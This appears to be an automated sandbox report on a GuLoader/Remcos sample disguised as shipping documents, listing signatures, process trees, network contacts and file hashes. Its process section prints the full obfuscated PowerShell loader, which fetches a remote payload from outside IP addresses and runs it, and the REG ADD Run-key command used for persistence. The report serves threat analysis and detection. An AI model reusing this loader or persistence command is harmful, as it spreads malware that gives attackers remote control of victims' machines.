Malware Analysis Report

2025-06-16 03:44

Sample ID 240325-qhgbkaha28
Target awb_shipping_documents_25_03_2024_000000000.7z
SHA256 a03168474f0454a3249bb978f77f837fe9386f2097387c2e0b87b843aa32a734
Tags: guloader remcos latest downloader persistence rat
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: a03168474f0454a3249bb978f77f837fe9386f2097387c2e0b87b843aa32a734

Threat Level: Known bad

The file awb_shipping_documents_25_03_2024_000000000.7z was found to be: Known bad.

Malicious Activity Summary

guloader remcos latest downloader persistence rat

Guloader,Cloudeye

Remcos

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Modifies registry key

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-03-25 13:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-03-25 13:15
Reported: 2024-03-25 13:18
Platform: win7-20240221-en
Max time kernel: 117s
Max time network: 121s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\Epizoa213 = "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\\antimakassar\\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2652 set thread context of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 2404 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 2404 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1736 wrote to memory of 2404 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2404 wrote to memory of 2672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2404 wrote to memory of 2672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2404 wrote to memory of 2652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2652 wrote to memory of 1204 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2652 wrote to memory of 1204 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2652 wrote to memory of 1204 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2652 wrote to memory of 1204 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2652 wrote to memory of 1344 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1344 wrote to memory of 2796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 2796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 2796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1344 wrote to memory of 2796 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2796 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2796 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2796 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patchy Corporis Vergaloo #>;<#sndagsskolers Paws Alexandrite Skit #>;New-Item -Path 'reservats:\Forfaldt' -Name 'Tiptipoldemoders' -ItemType 'file';<#Conto Perty Rkefjolss blencorn Vitrinernes #>;Function Tulipa ([String]$superofficiously){$Urikonografi = 2;For($Uri=1; $Uri -lt $superofficiously.Length-1; $Uri+=$Urikonografi){ $Urstrukturens = $superofficiously.Substring($Uri, $Forkhead); $Distingverende80=$Distingverende80+$Urstrukturens; }$Distingverende80;}$Forkhead = (cmd /c 'echo 1 && exit');if (Test-Path 'reservats:\Forfaldt\Tiptipoldemoders') {$Forkhead--};$Agillawood224=Tulipa ' i,eRxE ';$Outfound=Tulipa '.TSr a n,s fVeSr,rDi,nDg, ';$Monochordist = Tulipa 'A\Ss yDs wUoJw 6S4H\FW i.n,dHoFw,s PBo,wFePrPSFh,eTl l \Gv 1,. 0K\SpdoAwse,r.sKhue l.lB. e xVe. ';function Forefather ($Firetages){. ($Agillawood224) ($Firetages);}$Strangler=Tulipa '.hPtPtApR: /./V1 4.7D.r7P8.. 1 0h3U.A2 5 0R/ S pUr r eUr eNg e lo. pRsPdB>shGtStOp.: /P/I8.5,.F2 0r9 . 1S7,6M.O4.6,/GSTpCr.r e rSe g,eSl .Sp s.dS ';$Formbrndselsfabrikken236=$Strangler.split([char]62);$Strangler=$Formbrndselsfabrikken236[0];Forefather (Tulipa ' $CgPlSo.bDaBld:BF y sHi,oJt eSrBaGp,eSu.tEsDk oWlRe r =K$AeRnUv.: wTiUntdFiEr ') ;Forefather (Tulipa ' $ g l.opbTa l.:BL,eHvHiSnRe r = $ F yAsHi oRtne rSa,pLeFuPt s kUoMl eFr.+ $AM o n,o cDh,o r dLi s tN ') ;Forefather (Tulipa 'T$ gUlNo b afl :RHPaSa nAd.vArSkNe tEs .=A ,( (Kg wAm iS w iDnU3 2,_,p r.o.c eMs s. -,F. P,rSoZcNeGs s I d =D$,{PP IKD,} )A. C o m m aHn d.L,i n e.). .- s,p lMi t. 
b[.cPh aJr ] 3B4E ');Forefather (Tulipa ' $ g.lFoCb.a,lg: R dUtA1I8.5D .=, T$AH.aSa n d v r.k e t s [ $ H,aOaSn dLvGrBkEeTt s .FcBo,u.nEtV-M2S] ');Forefather (Tulipa 'A$tgPlRo b,a.l.: OHvhe.rVb eAf oAl k nMiSnSg.eSn,s = (,TOe s t - P,aTt hB .$ L.eVvUifnBe rM) F- AAn dT T(.[ I nst PDtAr ] :P: sKiKzOe M- eEqF 8E) ') ;if ($Overbefolkningens) {& $Leviner $Rdt185;} else {;$Genealogists=Tulipa 'A$ g,l,oTbNa l : M.iGn,i,f iseTdJ ,= ,SAt.a r tS-PB iLtAseTarSa nRs f eNr. -NSToFu r,c e, G$ISOt r a n g,lUe r. -DDSeBs t iknSa tvi.oLn, O$ FEyMs i o t.e,rRaep.eOuPtSs.k,o.l.e.rB ';Forefather (Tulipa '.$Ag lVo b.aTlM: FLySsfiToIt e,rMaFp,eSu.tOsBkRoklbeMr = $,eonKv :Sa pCp d aSt aE ') ;Forefather (Tulipa '.I mMpOowrOtT-.M o dTuAl.e, BEiStEs,T rMa n s f e.rG ') ;$Fysioterapeutskoler=$Fysioterapeutskoler+'\Judicial.Ara' ;Forefather (Tulipa ',$,g l.o b,a lA:ICThDoUl eSlTiItAh.odt.o.m yn= (ST,e sEtN-,P.aGt hS ,$VF,ySsUi,oRt,eAr a.pVeSuNtesTkBo,l e r ), ') ;while (-not $Cholelithotomy) {Forefather (Tulipa ' IAf ( $TM i.n.i fPi eBdK.DJ opbAS.t.aDt ei -Re qH ,$.OWu tNf o u,n d.)F K{YS.tPa,r.tc- SClDeBeVp M1C} etlAs.eN{SSOt a,r tf-NS l eFe pB 1S;TFSoSrBe f aPt h,e.rP ,$.GBeEn.e a lKo g i sot sA}D ');Forefather (Tulipa 'F$Eg.lHokb.a lP:aC hHo,l eMl iVtKhSo tSoRm y = (,T,e s t.-.P aNt,hM K$ FNy,s i ovt eTr.a.pCe u t s k oBlKe r )S ') ;$Strangler=$Formbrndselsfabrikken236[$Precompiler++%$Formbrndselsfabrikken236.count];}Forefather (Tulipa '.$Ggal o,bSaOlA:UP aDsFs.a gHe.r eCrPnRe.sN t=D TGNeAtT-BC o nutUeQn.tD D$,FAy,s iSo.t,e r alpFeRuEtSs.k oIl,eNr ');Forefather (Tulipa 'K$Hg lDo.bBaPlN:DD.uGr o mOeLtHe,rRs = [.S yVsStPe m,. C,o nBv e rDt.]D:R: F ruo,m BPaKs e,6O4DSPtLrSiNnFg (J$ P aGsTs a.gteUr eBr.n e s,) ');Forefather (Tulipa 'I$,g lWo bBaOl.:,V.aSlCm.u.eB S=f S[.SRyFs t eUmB.,TSe x tK. 
E nFcuo,d iHnKg ].:P:UAPSTC.IVIS.,G.eSt.SFtTr i,n.g (.$ DHu,r.o.m eHtReDrKs )H ');Forefather (Tulipa ' $ g l.o,bPaAl,:SCueNp.h a.l o,cHhCoSr dEaS=A$,V a.lEm,uSe,.Ps,u b,s tUrHiFnKg (.2E9R1I1M8L6S, 2 3K4S0E0C)S ');Forefather $Cephalochorda;};;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" (re-launched with the same obfuscated PowerShell script passed to the System32 powershell.exe entry above; the command line is identical)

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"

Network

Country Destination Domain Proto
NL 147.78.103.250:80 147.78.103.250 tcp
NL 147.78.103.250:80 147.78.103.250 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Tar40FB.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Temp\Cab40F8.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar467D.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IP3KYTWLGLS12BKGRK4S.temp

MD5 e6855b698fbeceacb3b4c96de7246444
SHA1 fa81d0a6e58baa9bb4256a36e5594c00d0cb257a
SHA256 75d6628cd01af0afc387545948b4fc74f2204bddf969772f57d57effc2b85ae9
SHA512 80995c986c267f6ee94a4129c99fbe2e2929ce8786ec5275558ba4db771807da8aaeaebee7eb66ab8bc053652c3132a4e4a6f0e171c836adc4dffc0fe15e8ebe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56806503d509b74473ee9cd6de3ee361
SHA1 99d3ebf5f6726c1bd224349d858d15cef1d76835
SHA256 03c56f28cf9424b093882e6d5bc0edcbcffe15315348046f6e5d4f7ef6bccc2f
SHA512 3a618c9e42f0741be6a57a126554cdaaed87eae96ef78accf5f91753a320a96f3ad5b38d327eb539e44274f1a6e57962ab00addfaaac9a7a119404fd903e774f

Analysis: behavioral2

Detonation Overview

Submitted: 2024-03-25 13:15
Reported: 2024-03-25 13:18
Platform: win10v2004-20240226-en
Max time kernel: 160s
Max time network: 162s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Epizoa213 = "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\\antimakassar\\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2648 set thread context of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3768 wrote to memory of 1188 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3768 wrote to memory of 1188 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1188 wrote to memory of 4512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1188 wrote to memory of 4512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1188 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1188 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1188 wrote to memory of 2648 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2648 wrote to memory of 4296 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2648 wrote to memory of 4296 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2648 wrote to memory of 4296 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2648 wrote to memory of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2648 wrote to memory of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2648 wrote to memory of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2648 wrote to memory of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2648 wrote to memory of 3620 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3620 wrote to memory of 184 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3620 wrote to memory of 184 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3620 wrote to memory of 184 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 184 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 184 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 184 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_documents_25_03_2024_000000000.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (same obfuscated PowerShell script as the first powershell.exe entry under Analysis: behavioral1; the command line is identical)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" (re-launched with the same obfuscated PowerShell script as the first powershell.exe entry under Analysis: behavioral1; the command line is identical)

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo 1 && exit"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epizoa213" /t REG_EXPAND_SZ /d "%Overborgmesteren% -w 1 $Skrubbenes31=(Get-ItemProperty -Path 'HKCU:\antimakassar\').Nissehue183;%Overborgmesteren% ($Skrubbenes31)"

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klf3aukr.vqi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
